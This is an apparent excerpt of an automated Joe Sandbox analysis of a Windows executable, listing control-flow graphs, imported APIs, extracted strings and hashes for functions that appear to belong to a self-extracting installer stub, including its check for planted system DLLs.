                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                                                  • Instruction ID: 46b5cbd22a981ab8f7dfc2610968e940f6cbd20d3a8bf642bbe0e474ca122d68
                                                                                  • Opcode Fuzzy Hash: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                                                  • Instruction Fuzzy Hash: 7BB1B1A2B057D992FE58EAA5D518AE9E391BB05FC4F888036EE1D07741DF3CE156C320
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                  • String ID:
                                                                                  • API String ID: 3340455307-0
                                                                                  • Opcode ID: 351ceed20d24346c920f2b33a82c7c15764e1b5f9a2ac08ee0b3c21e451927ce
                                                                                  • Instruction ID: 016e8b0fddff892d8744856518f58fd24592a7fe90953f1aba7e9420f2b8c7e7
                                                                                  • Opcode Fuzzy Hash: 351ceed20d24346c920f2b33a82c7c15764e1b5f9a2ac08ee0b3c21e451927ce
                                                                                  • Instruction Fuzzy Hash: AE412822B1575A87FA64EF65A900B6AA252FFC4784F888034DF0D07795DE3CE887C314

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 7ff75aabdfd0-7ff75aabe024 call 7ff75aad2450 GetModuleHandleW 3 7ff75aabe026-7ff75aabe039 GetProcAddress 0->3 4 7ff75aabe07b-7ff75aabe3a5 0->4 7 7ff75aabe053-7ff75aabe066 GetProcAddress 3->7 8 7ff75aabe03b-7ff75aabe04a 3->8 5 7ff75aabe503-7ff75aabe521 call 7ff75aab6454 call 7ff75aab7df4 4->5 6 7ff75aabe3ab-7ff75aabe3b4 call 7ff75aadb788 4->6 19 7ff75aabe525-7ff75aabe52f call 7ff75aab51a4 5->19 6->5 16 7ff75aabe3ba-7ff75aabe3fd call 7ff75aab6454 CreateFileW 6->16 7->4 10 7ff75aabe068-7ff75aabe078 7->10 8->7 10->4 22 7ff75aabe4f0-7ff75aabe4fe CloseHandle call 7ff75aaa1fa0 16->22 23 7ff75aabe403-7ff75aabe416 SetFilePointer 16->23 27 7ff75aabe531-7ff75aabe53c call 7ff75aabdd88 19->27 28 7ff75aabe564-7ff75aabe5ac call 7ff75aad797c call 7ff75aaa129c call 7ff75aab8090 call 7ff75aaa1fa0 call 7ff75aab32bc 19->28 22->5 23->22 25 7ff75aabe41c-7ff75aabe43e ReadFile 23->25 25->22 29 7ff75aabe444-7ff75aabe452 25->29 27->28 40 7ff75aabe53e-7ff75aabe562 CompareStringW 27->40 66 7ff75aabe5b1-7ff75aabe5b4 28->66 32 7ff75aabe800-7ff75aabe807 call 7ff75aad2624 29->32 33 7ff75aabe458-7ff75aabe4ac call 7ff75aad797c call 7ff75aaa129c 29->33 49 7ff75aabe4c3-7ff75aabe4d9 call 7ff75aabd0a0 33->49 40->28 43 7ff75aabe5bd-7ff75aabe5c6 40->43 43->19 47 7ff75aabe5cc 43->47 50 7ff75aabe5d1-7ff75aabe5d4 47->50 61 7ff75aabe4ae-7ff75aabe4be call 7ff75aabdd88 49->61 62 7ff75aabe4db-7ff75aabe4eb call 7ff75aaa1fa0 * 2 49->62 53 7ff75aabe63f-7ff75aabe642 50->53 54 7ff75aabe5d6-7ff75aabe5d9 50->54 57 7ff75aabe7c2-7ff75aabe7ff call 7ff75aaa1fa0 * 2 call 7ff75aad2320 53->57 58 7ff75aabe648-7ff75aabe65b call 7ff75aab7eb0 call 7ff75aab51a4 53->58 59 7ff75aabe5dd-7ff75aabe62d call 7ff75aad797c call 7ff75aaa129c call 7ff75aab8090 call 7ff75aaa1fa0 call 7ff75aab32bc 54->59 82 7ff75aabe661-7ff75aabe701 call 7ff75aabdd88 * 2 call 7ff75aabaae0 call 7ff75aabda98 call 7ff75aabaae0 call 7ff75aabdc2c call 7ff75aac87ac call 7ff75aaa19e0 58->82 83 7ff75aabe706-7ff75aabe753 call 7ff75aabda98 AllocConsole 58->83 107 7ff75aabe62f-7ff75aabe638 59->107 108 7ff75aabe63c 59->108 61->49 62->22 73 7ff75aabe5b6 66->73 74 7ff75aabe5ce 66->74 73->43 74->50 100 7ff75aabe7b4-7ff75aabe7bb call 7ff75aaa19e0 ExitProcess 82->100 94 7ff75aabe7b0 83->94 95 7ff75aabe755-7ff75aabe7aa GetCurrentProcessId AttachConsole call 7ff75aabe868 call 7ff75aabe858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->100 95->94 107->59 112 7ff75aabe63a 107->112 108->53 112->53
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                  • API String ID: 1496594111-2013832382
                                                                                  • Opcode ID: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
                                                                                  • Instruction ID: 55eac333892586f53c154f78afb9fa96f68cbe2571ced87d24e7c2ff03340560
                                                                                  • Opcode Fuzzy Hash: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
                                                                                  • Instruction Fuzzy Hash: 13323131A09B8299FB21AFA0E8409E9B3A4FF54354FD4027ADA4D07765EF3CD656C360
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AAB8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF75AAB8F8D
                                                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF75AAB9F75
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AABA42F
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AABA435
                                                                                    • Part of subcall function 00007FF75AAC0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF75AAC0B44), ref: 00007FF75AAC0BE9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                  • API String ID: 3629253777-3268106645
                                                                                  • Opcode ID: c7e299983de1d31cdbd1676a4e843f0011001ae21b66b5c33926bd5b009ca2a1
                                                                                  • Instruction ID: a98bf1b26c13e22388a75d6f304027742d5a5c26c2651cfff9ec007a692c548b
                                                                                  • Opcode Fuzzy Hash: c7e299983de1d31cdbd1676a4e843f0011001ae21b66b5c33926bd5b009ca2a1
                                                                                  • Instruction Fuzzy Hash: 1562D132A1878A86FB50EBA4D444ABDA361FF40784FC84176DA4D076D9EF3DE946C360

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1910 7ff75aad1900-7ff75aad1989 call 7ff75aad1558 1913 7ff75aad19b4-7ff75aad19d1 1910->1913 1914 7ff75aad198b-7ff75aad19af call 7ff75aad1868 RaiseException 1910->1914 1915 7ff75aad19d3-7ff75aad19e4 1913->1915 1916 7ff75aad19e6-7ff75aad19ea 1913->1916 1922 7ff75aad1bb8-7ff75aad1bd5 1914->1922 1918 7ff75aad19ed-7ff75aad19f9 1915->1918 1916->1918 1920 7ff75aad19fb-7ff75aad1a0d 1918->1920 1921 7ff75aad1a1a-7ff75aad1a1d 1918->1921 1930 7ff75aad1a13 1920->1930 1931 7ff75aad1b89-7ff75aad1b93 1920->1931 1923 7ff75aad1a23-7ff75aad1a26 1921->1923 1924 7ff75aad1ac4-7ff75aad1acb 1921->1924 1928 7ff75aad1a3d-7ff75aad1a52 LoadLibraryExA 1923->1928 1929 7ff75aad1a28-7ff75aad1a3b 1923->1929 1926 7ff75aad1adf-7ff75aad1ae2 1924->1926 1927 7ff75aad1acd-7ff75aad1adc 1924->1927 1932 7ff75aad1b85 1926->1932 1933 7ff75aad1ae8-7ff75aad1aec 1926->1933 1927->1926 1934 7ff75aad1a54-7ff75aad1a67 GetLastError 1928->1934 1935 7ff75aad1aa9-7ff75aad1ab2 1928->1935 1929->1928 1929->1935 1930->1921 1942 7ff75aad1b95-7ff75aad1ba6 1931->1942 1943 7ff75aad1bb0 call 7ff75aad1868 1931->1943 1932->1931 1940 7ff75aad1b1b-7ff75aad1b2e GetProcAddress 1933->1940 1941 7ff75aad1aee-7ff75aad1af2 1933->1941 1944 7ff75aad1a7e-7ff75aad1aa4 call 7ff75aad1868 RaiseException 1934->1944 1945 7ff75aad1a69-7ff75aad1a7c 1934->1945 1936 7ff75aad1ab4-7ff75aad1ab7 FreeLibrary 1935->1936 1937 7ff75aad1abd 1935->1937 1936->1937 1937->1924 1940->1932 1948 7ff75aad1b30-7ff75aad1b43 GetLastError 1940->1948 1941->1940 1949 7ff75aad1af4-7ff75aad1aff 1941->1949 1942->1943 1951 7ff75aad1bb5 1943->1951 1944->1922 1945->1935 1945->1944 1953 7ff75aad1b45-7ff75aad1b58 1948->1953 1954 7ff75aad1b5a-7ff75aad1b81 call 7ff75aad1868 RaiseException call 7ff75aad1558 1948->1954 1949->1940 1955 7ff75aad1b01-7ff75aad1b08 1949->1955 1951->1922 1953->1932 1953->1954 1954->1932 1955->1940 1956 7ff75aad1b0a-7ff75aad1b0f 1955->1956 1956->1940 1958 7ff75aad1b11-7ff75aad1b19 1956->1958 1958->1932 1958->1940
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                  • String ID: H
                                                                                  • API String ID: 3432403771-2852464175
                                                                                  • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                  • Instruction ID: abbce6e9b3252b14915c1b452d5ef79878b483a24835ddd225db647b971dfa0d
                                                                                  • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                  • Instruction Fuzzy Hash: 31914C32B05B528AFB90EFA5D844AA8A3A1FF08B54F884479DE4D17754EF38E446C320

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1988 7ff75aacf4e0-7ff75aacf523 1989 7ff75aacf894-7ff75aacf8b9 call 7ff75aaa1fa0 call 7ff75aad2320 1988->1989 1990 7ff75aacf529-7ff75aacf565 call 7ff75aad3cf0 1988->1990 1996 7ff75aacf567 1990->1996 1997 7ff75aacf56a-7ff75aacf571 1990->1997 1996->1997 1999 7ff75aacf573-7ff75aacf577 1997->1999 2000 7ff75aacf582-7ff75aacf586 1997->2000 2001 7ff75aacf57c-7ff75aacf580 1999->2001 2002 7ff75aacf579 1999->2002 2003 7ff75aacf58b-7ff75aacf596 2000->2003 2004 7ff75aacf588 2000->2004 2001->2003 2002->2001 2005 7ff75aacf59c 2003->2005 2006 7ff75aacf628 2003->2006 2004->2003 2007 7ff75aacf5a2-7ff75aacf5a9 2005->2007 2008 7ff75aacf62c-7ff75aacf62f 2006->2008 2011 7ff75aacf5ab 2007->2011 2012 7ff75aacf5ae-7ff75aacf5b3 2007->2012 2009 7ff75aacf631-7ff75aacf635 2008->2009 2010 7ff75aacf637-7ff75aacf63a 2008->2010 2009->2010 2013 7ff75aacf660-7ff75aacf673 call 7ff75aab63ac 2009->2013 2010->2013 2014 7ff75aacf63c-7ff75aacf643 2010->2014 2011->2012 2015 7ff75aacf5e5-7ff75aacf5f0 2012->2015 2016 7ff75aacf5b5 2012->2016 2031 7ff75aacf675-7ff75aacf693 call 7ff75aac13c4 2013->2031 2032 7ff75aacf698-7ff75aacf6ed call 7ff75aad797c call 7ff75aaa129c call 7ff75aab32a8 call 7ff75aaa1fa0 2013->2032 2014->2013 2017 7ff75aacf645-7ff75aacf65c 2014->2017 2019 7ff75aacf5f5-7ff75aacf5fa 2015->2019 2020 7ff75aacf5f2 2015->2020 2021 7ff75aacf5ca-7ff75aacf5d0 2016->2021 2017->2013 2025 7ff75aacf600-7ff75aacf607 2019->2025 2026 7ff75aacf8ba-7ff75aacf8c1 2019->2026 2020->2019 2022 7ff75aacf5d2 2021->2022 2023 7ff75aacf5b7-7ff75aacf5be 2021->2023 2022->2015 2027 7ff75aacf5c3-7ff75aacf5c8 2023->2027 2028 7ff75aacf5c0 2023->2028 2033 7ff75aacf60c-7ff75aacf612 2025->2033 2034 7ff75aacf609 2025->2034 2029 7ff75aacf8c3 2026->2029 2030 7ff75aacf8c6-7ff75aacf8cb 2026->2030 2027->2021 2035 7ff75aacf5d4-7ff75aacf5db 2027->2035 2028->2027 2029->2030 2036 7ff75aacf8cd-7ff75aacf8d4 2030->2036 2037 7ff75aacf8de-7ff75aacf8e6 2030->2037 2031->2032 2055 7ff75aacf6ef-7ff75aacf73d call 7ff75aad797c call 7ff75aaa129c call 7ff75aab5b60 call 7ff75aaa1fa0 2032->2055 2056 7ff75aacf742-7ff75aacf74f ShellExecuteExW 2032->2056 2033->2026 2040 7ff75aacf618-7ff75aacf622 2033->2040 2034->2033 2041 7ff75aacf5e0 2035->2041 2042 7ff75aacf5dd 2035->2042 2043 7ff75aacf8d6 2036->2043 2044 7ff75aacf8d9 2036->2044 2045 7ff75aacf8eb-7ff75aacf8f6 2037->2045 2046 7ff75aacf8e8 2037->2046 2040->2006 2040->2007 2041->2015 2042->2041 2043->2044 2044->2037 2045->2008 2046->2045 2055->2056 2058 7ff75aacf755-7ff75aacf75f 2056->2058 2059 7ff75aacf846-7ff75aacf84e 2056->2059 2063 7ff75aacf76f-7ff75aacf772 2058->2063 2064 7ff75aacf761-7ff75aacf764 2058->2064 2061 7ff75aacf850-7ff75aacf866 2059->2061 2062 7ff75aacf882-7ff75aacf88f 2059->2062 2068 7ff75aacf87d call 7ff75aad220c 2061->2068 2069 7ff75aacf868-7ff75aacf87b 2061->2069 2062->1989 2065 7ff75aacf774-7ff75aacf77f call 7ff75ab0e188 2063->2065 2066 7ff75aacf78e-7ff75aacf7ad call 7ff75ab0e1b8 call 7ff75aacfe24 2063->2066 2064->2063 2070 7ff75aacf766-7ff75aacf76d 2064->2070 2065->2066 2085 7ff75aacf781-7ff75aacf78c ShowWindow 2065->2085 2071 7ff75aacf7e3-7ff75aacf7f0 CloseHandle 2066->2071 2096 7ff75aacf7af-7ff75aacf7b2 2066->2096 2068->2062 2069->2068 2075 7ff75aacf8fb-7ff75aacf903 call 7ff75aad7904 2069->2075 2070->2063 2070->2071 2081 7ff75aacf805-7ff75aacf80c 2071->2081 2082 7ff75aacf7f2-7ff75aacf803 call 7ff75aac13c4 2071->2082 2083 7ff75aacf82e-7ff75aacf830 2081->2083 2084 7ff75aacf80e-7ff75aacf811 2081->2084 2082->2081 2082->2083 2083->2059 2092 7ff75aacf832-7ff75aacf835 2083->2092 2084->2083 2091 7ff75aacf813-7ff75aacf828 2084->2091 2085->2066 2091->2083 2092->2059 2095 7ff75aacf837-7ff75aacf845 ShowWindow 2092->2095 2095->2059 2096->2071 2098 7ff75aacf7b4-7ff75aacf7c5 GetExitCodeProcess 2096->2098 2098->2071 2099 7ff75aacf7c7-7ff75aacf7dc 2098->2099 2099->2071
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: .exe$.inf$Install$p
                                                                                  • API String ID: 1054546013-3607691742
                                                                                  • Opcode ID: 22420bc2198f6078b2f288bbded650d2fe37d63e6dbd6053a2019b52a2d3da4b
                                                                                  • Instruction ID: c1cc3f0ea9c0ab60fcfc196c07c7d868fd2041c8b6eb2701cec2734719c5e665
                                                                                  • Opcode Fuzzy Hash: 22420bc2198f6078b2f288bbded650d2fe37d63e6dbd6053a2019b52a2d3da4b
                                                                                  • Instruction Fuzzy Hash: 79C1C562F08B0295FB00EBA5D964A7DA7B1BF84780F8840B5EA4D477A4DF3CE552C360

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3569833718-0
                                                                                  • Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                  • Instruction ID: fec56f9bcbb2ea05c4144ec4f4c054a96c00dbb07e1c416dddd5658709638dca
                                                                                  • Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                  • Instruction Fuzzy Hash: AE41B231B14A4286F704AF61E814FA96760FF89B98F881175ED0A07B95CF3ED44687A4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: b60b4e85dca72afb36c41ecd76671d2e4f9ea4131e30583f6657b838cfa2a64e
                                                                                  • Instruction ID: 28ac6312de96ca2a79588f0ff2ca2083eb76761d7cd2d0fa2e81a4b89f5a8a8e
                                                                                  • Opcode Fuzzy Hash: b60b4e85dca72afb36c41ecd76671d2e4f9ea4131e30583f6657b838cfa2a64e
                                                                                  • Instruction Fuzzy Hash: F312C362F08B4285FB10EBA4D4446BDA3B1EF44798F844276DA5D17AD9DF3CD48AC3A0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3527 7ff75aab24c0-7ff75aab24fb 3528 7ff75aab2506 3527->3528 3529 7ff75aab24fd-7ff75aab2504 3527->3529 3530 7ff75aab2509-7ff75aab2578 3528->3530 3529->3528 3529->3530 3531 7ff75aab257a 3530->3531 3532 7ff75aab257d-7ff75aab25a8 CreateFileW 3530->3532 3531->3532 3533 7ff75aab2688-7ff75aab268d 3532->3533 3534 7ff75aab25ae-7ff75aab25de GetLastError call 7ff75aab6a0c 3532->3534 3535 7ff75aab2693-7ff75aab2697 3533->3535 3543 7ff75aab25e0-7ff75aab262a CreateFileW GetLastError 3534->3543 3544 7ff75aab262c 3534->3544 3537 7ff75aab26a5-7ff75aab26a9 3535->3537 3538 7ff75aab2699-7ff75aab269c 3535->3538 3541 7ff75aab26cf-7ff75aab26e3 3537->3541 3542 7ff75aab26ab-7ff75aab26af 3537->3542 3538->3537 3540 7ff75aab269e 3538->3540 3540->3537 3546 7ff75aab26e5-7ff75aab26f0 3541->3546 3547 7ff75aab270c-7ff75aab2735 call 7ff75aad2320 3541->3547 3542->3541 3545 7ff75aab26b1-7ff75aab26c9 SetFileTime 3542->3545 3548 7ff75aab2632-7ff75aab263a 3543->3548 3544->3548 3545->3541 3550 7ff75aab26f2-7ff75aab26fa 3546->3550 3551 7ff75aab2708 3546->3551 3552 7ff75aab2673-7ff75aab2686 3548->3552 3553 7ff75aab263c-7ff75aab2653 3548->3553 3557 7ff75aab26ff-7ff75aab2703 call 7ff75aaa20b0 3550->3557 3558 7ff75aab26fc 3550->3558 3551->3547 3552->3535 3554 7ff75aab2655-7ff75aab2668 3553->3554 3555 7ff75aab266e call 7ff75aad220c 3553->3555 3554->3555 3560 7ff75aab2736-7ff75aab273b call 7ff75aad7904 3554->3560 3555->3552 3557->3551 3558->3557
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3536497005-0
                                                                                  • Opcode ID: bf6d388e0ddc62a07829c0e0ddc79988d82f0ae4bc2505d9adb649ad5df9f7e3
                                                                                  • Instruction ID: a141c08321da2b7147bb933645b087958132af3f6c9c61b6b64f2c97e97c06e1
                                                                                  • Opcode Fuzzy Hash: bf6d388e0ddc62a07829c0e0ddc79988d82f0ae4bc2505d9adb649ad5df9f7e3
